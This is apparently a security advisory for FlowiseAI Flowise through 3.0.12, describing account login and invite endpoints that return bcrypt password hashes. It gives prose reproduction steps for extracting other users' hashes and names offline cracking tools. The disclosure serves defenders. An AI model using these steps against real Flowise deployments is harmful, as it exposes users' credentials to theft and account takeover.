FlowiseAI Flowise Information Disclosure Vulnerability in Account Login and Invite Endpoints

A vulnerability allowing information disclosure has been identified in FlowiseAI Flowise versions through 3.0.12. The issue arises in the API Response Handler component, specifically within the Login function of the account service. The vulnerability allows an authenticated user to access sensitive information, such as bcrypt password hashes, through the login and invite endpoints. This flaw can be exploited remotely and is associated with a high level of complexity.

Impact

Exploitation of this vulnerability allows for the extraction of bcrypt password hashes from the API response, which can be cracked offline using tools like hashcat or john. This exposure enables credential stuffing attacks, lateral movement by obtaining plaintext passwords of other Flowise users, and privilege escalation if an admin's password is cracked.

Reproduction

To reproduce this vulnerability, authenticate a user via the '/api/v1/auth/login' endpoint to obtain a JWT token. Then, send a POST request to the '/api/v1/account/login' endpoint with the user's email and password. The response will include the unsanitized user object containing the credential hash. Alternatively, for Flowise enterprise users, the '/api/v1/account/invite' endpoint can be used to extract password hashes of existing users by sending an invite request to their email.